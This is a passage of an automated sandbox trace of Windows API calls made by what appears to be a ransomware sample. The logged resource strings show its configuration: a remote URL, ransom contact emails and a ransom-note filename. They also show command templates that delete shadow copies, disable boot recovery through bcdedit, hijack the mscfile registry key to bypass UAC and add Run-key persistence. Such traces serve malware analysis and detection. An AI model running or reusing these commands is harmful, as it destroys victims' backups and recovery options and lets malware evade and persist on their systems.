lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="June") returned 5 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0117.104] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0117.104] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0117.104] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0117.104] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0117.104] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0117.104] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="getpeername") returned 0x77387147 [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 0x77386b0e [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0117.108] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0117.108] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0117.108] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0117.108] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0117.108] GetProcAddress (hModule=0x77380000, lpProcName="getservbyname") returned 0x77396ef3 [0117.108] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0117.108] GetProcAddress (hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0117.108] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0117.108] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0117.108] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0117.108] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0117.114] GetACP () returned 0x4e4 [0117.114] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0117.114] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe")) returned 0x30 [0117.114] GetTickCount () returned 0x27c7f [0117.115] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=17390375616) returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4a\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x77\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x68\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x56\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x48\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x70\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x72\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x32\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x7a\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x66\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x51\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4c\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x55\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x36\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x49\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x73\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0117.115] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0117.115] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0117.115] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0117.115] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0117.115] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0117.115] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0117.115] LockResource (hResData=0x50d55c) returned 0x50d55c [0117.116] FreeResource (hResData=0x50d55c) returned 0 [0117.116] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0117.116] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0117.116] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0117.116] LockResource (hResData=0x50d64c) returned 0x50d64c [0117.116] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0117.116] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x634f60, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0117.116] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x634f60, cbMultiByte=38, lpWideCharStr=0x62de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0117.116] FreeResource (hResData=0x50d64c) returned 0 [0117.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0117.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x634f64, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0117.116] GetCurrentThreadId () returned 0xe60 [0117.116] GetCurrentThreadId () returned 0xe60 [0117.116] GetCurrentThreadId () returned 0xe60 [0117.116] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x5ecd18, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0117.116] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x5ecd18, cbMultiByte=239, lpWideCharStr=0x5f2e7c, cchWideChar=239 | out: lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0117.116] GetCurrentThreadId () returned 0xe60 [0117.116] GetCurrentThreadId () returned 0xe60 [0117.116] GetCurrentThreadId () returned 0xe60 [0117.116] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0117.116] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x5e399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0117.117] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x5e399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0117.117] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x5e39b4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0117.119] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x5e39b4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0117.120] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x5e39b4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0117.121] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x5e39b4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0117.121] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x5e39b4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0117.122] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x5e39b4, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0117.123] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x5e39b4, csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0117.124] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x5e39b4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0117.124] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x5e39b4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0117.126] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x5cc63c, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0117.126] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x5cc63c, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0117.126] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x5cc63c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0117.126] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x5cc63c, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0117.126] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0117.126] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0117.126] SizeofResource (hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0117.126] LockResource (hResData=0x50d72c) returned 0x50d72c [0117.126] FreeResource (hResData=0x50d72c) returned 0 [0117.126] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0117.126] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0117.126] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0117.126] LockResource (hResData=0x50d64c) returned 0x50d64c [0117.126] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x635008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0117.126] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x635008, cbMultiByte=38, lpWideCharStr=0x62deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0117.126] FreeResource (hResData=0x50d64c) returned 0 [0117.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0117.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x63500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0117.126] GetCurrentThreadId () returned 0xe60 [0117.126] GetCurrentThreadId () returned 0xe60 [0117.126] GetCurrentThreadId () returned 0xe60 [0117.126] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x5ce688, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0117.126] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x5ce688, cbMultiByte=1410, lpWideCharStr=0x5e9afc, cchWideChar=1410 | out: lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0117.127] GetCurrentThreadId () returned 0xe60 [0117.127] GetCurrentThreadId () returned 0xe60 [0117.127] GetCurrentThreadId () returned 0xe60 [0117.127] GetCurrentThread () returned 0xfffffffe [0117.127] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0117.127] GetLastError () returned 0x3f0 [0117.127] GetCurrentProcess () returned 0xffffffff [0117.127] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0117.127] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x5e7ae0, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x5e7ae0, ReturnLength=0x12fc60) returned 1 [0117.127] CloseHandle (hObject=0xb8) returned 1 [0117.127] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x726438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0117.127] EqualSid (pSid1=0x726438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x5e7b44*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0117.127] EqualSid (pSid1=0x726438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x5e7b60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0117.127] EqualSid (pSid1=0x726438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x5e7b6c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0117.127] GetCurrentProcess () returned 0xffffffff [0117.127] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0117.127] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0117.127] GetLastError () returned 0x7a [0117.127] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x7276d8 [0117.127] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x7276d8, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x7276d8, ReturnLength=0x12fc64) returned 1 [0117.127] GetSidSubAuthorityCount (pSid=0x7276e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, 